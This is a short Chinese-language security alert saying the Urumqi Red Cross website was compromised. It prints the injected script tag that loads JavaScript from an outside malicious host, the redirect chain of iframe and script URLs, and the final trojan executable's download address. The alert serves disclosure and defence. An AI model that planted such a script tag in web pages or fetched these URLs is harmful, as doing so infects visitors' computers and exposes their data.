乌鲁木齐市红十字会被植入恶意代码
乌鲁木齐市红十字会(h**p://www.wlredcross.org.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.wlredcross.org.cn/news/list.asp?id=824
网页被嵌入恶意链接代码:
<script language=”javascript” src=”http://officeon.viens.la/office.js?google_ad_format=728×90_as”></script>
挂马分析:
[wide]http://www.wlredcross.org.cn/news/list.asp?id=824
[script]http://officeon.viens.la/office.js?google_ad_format=728×90_as
[frame]http://4trgreev.cn/09/0009.htm
[frame]http://4trgreev.cn/09/index.html
[script]http://4trgreev.cn/09/js.js
[frame]http://4trgreev.cn/09/xyqm.htm
[frame]http://4trgreev.cn/09/xy14.htm
[frame]http://4trgreev.cn/09/xyfl.htm
[frame]http://4trgreev.cn/09/xyff.htm
[frame]http://4trgreev.cn/09/z.htm
[frame]http://4trgreev.cn/09/xyvod.htm
[frame]http://4trgreev.cn/09/xyxxz.htm
[frame]http://4trgreev.cn/09/ytlb.htm
[frame]http://4trgreev.cn/09/xy122121.htm
[script]http://js.tongji.cn.yahoo.com/1103419/ystat.js
[frame]http://4trgreev.cn/09/0009.htm
[frame]http://4trgreev.cn/09/0009.htm
[frame]http://4trgreev.cn/09/0009.htm
[frame]http://4trgreev.cn/09/0009.htm
[frame]http://4trgreev.cn/09/0009.htm
[frame]http://4trgreev.cn/09/0009.htm
[frame]http://officeon.viens.la/about:blank
[frame]http://ddv.sarl.tk/cnzz1.html
[frame]http://count41.51yes.com/sa.aspx?id=419175949&refe=
最终下载病毒文件:
h**p://9xddw2.cn/9.exe
关键字:乌鲁木齐市红十字